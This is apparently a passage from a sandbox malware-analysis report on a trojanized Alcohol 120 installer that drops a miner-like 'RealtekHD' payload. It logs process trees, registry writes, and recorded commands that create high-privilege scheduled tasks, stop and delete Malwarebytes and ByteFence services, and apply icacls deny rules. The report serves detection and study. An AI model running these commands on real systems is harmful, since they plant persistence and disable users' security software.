176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\ProgramData\Setup\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\ProgramData\Setup\update.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\ProgramData\Setup\update.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\ProgramData\Setup\update.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\ProgramData\Setup\update.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\ProgramData\Setup\WinMgmts:\ C:\ProgramData\Setup\update.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\ProgramData\Setup\taskhost.exe N/A
N/A N/A C:\ProgramData\Setup\update.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\ProgramData\RealtekHD\taskhostw.exe N/A
N/A N/A C:\Programdata\RealtekHD\taskhost.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\ProgramData\WindowsTask\MicrosoftHost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\WindowsTask\MicrosoftHost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1152 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin
PID 1152 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin
PID 1152 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin
PID 1152 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin
PID 2280 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin C:\ProgramData\Setup\update.exe
PID 2280 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin C:\ProgramData\Setup\update.exe
PID 2280 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin C:\ProgramData\Setup\update.exe
PID 2280 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin C:\ProgramData\Setup\update.exe
PID 2280 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin C:\ProgramData\Setup\update.exe
PID 2280 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin C:\ProgramData\Setup\update.exe
PID 2280 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin C:\ProgramData\Setup\update.exe
PID 2232 wrote to memory of 2664 N/A C:\ProgramData\Setup\update.exe C:\ProgramData\Setup\taskhost.exe
PID 2232 wrote to memory of 2664 N/A C:\ProgramData\Setup\update.exe C:\ProgramData\Setup\taskhost.exe
PID 2232 wrote to memory of 2664 N/A C:\ProgramData\Setup\update.exe C:\ProgramData\Setup\taskhost.exe
PID 2232 wrote to memory of 2664 N/A C:\ProgramData\Setup\update.exe C:\ProgramData\Setup\taskhost.exe
PID 2232 wrote to memory of 2668 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 2668 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 2668 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 2668 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 2808 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 2808 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 2808 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 2808 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 3004 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 3004 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 3004 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 3004 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 476 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 476 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 476 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 476 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\schtasks.exe
PID 2232 wrote to memory of 540 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2232 wrote to memory of 540 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2232 wrote to memory of 540 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2232 wrote to memory of 540 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 540 wrote to memory of 580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 540 wrote to memory of 580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 540 wrote to memory of 580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 540 wrote to memory of 580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2232 wrote to memory of 1540 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2232 wrote to memory of 1540 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2232 wrote to memory of 1540 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2232 wrote to memory of 1540 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 1636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1540 wrote to memory of 1636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1540 wrote to memory of 1636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1540 wrote to memory of 1636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2232 wrote to memory of 1848 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2232 wrote to memory of 1848 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2232 wrote to memory of 1848 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2232 wrote to memory of 1848 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 1848 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1848 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1848 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1848 wrote to memory of 1988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2232 wrote to memory of 1628 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2232 wrote to memory of 1628 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2232 wrote to memory of 1628 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 2232 wrote to memory of 1628 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe
PID 1628 wrote to memory of 2320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1628 wrote to memory of 2320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1628 wrote to memory of 2320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 1628 wrote to memory of 2320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2232 wrote to memory of 1652 N/A C:\ProgramData\Setup\update.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe"

C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin

C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin -ptoptorrent

C:\ProgramData\Setup\update.exe

"C:\ProgramData\Setup\update.exe"

C:\ProgramData\Setup\taskhost.exe

C:\ProgramData\Setup\taskhost.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appidsvc

C:\Windows\SysWOW64\sc.exe

sc start appidsvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appmgmt

C:\Windows\SysWOW64\sc.exe

sc start appmgmt

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto

C:\Windows\SysWOW64\sc.exe

sc config appidsvc start= auto

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto

C:\Windows\SysWOW64\sc.exe

sc config appmgmt start= auto

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete swprv

C:\Windows\SysWOW64\sc.exe

sc delete swprv

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop mbamservice

C:\Windows\SysWOW64\sc.exe

sc stop mbamservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop bytefenceservice

C:\Windows\SysWOW64\sc.exe

sc stop bytefenceservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete bytefenceservice

C:\Windows\SysWOW64\sc.exe

sc delete bytefenceservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete mbamservice

C:\Windows\SysWOW64\sc.exe

sc delete mbamservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete crmsvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

C:\Windows\SysWOW64\sc.exe

sc delete crmsvc

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

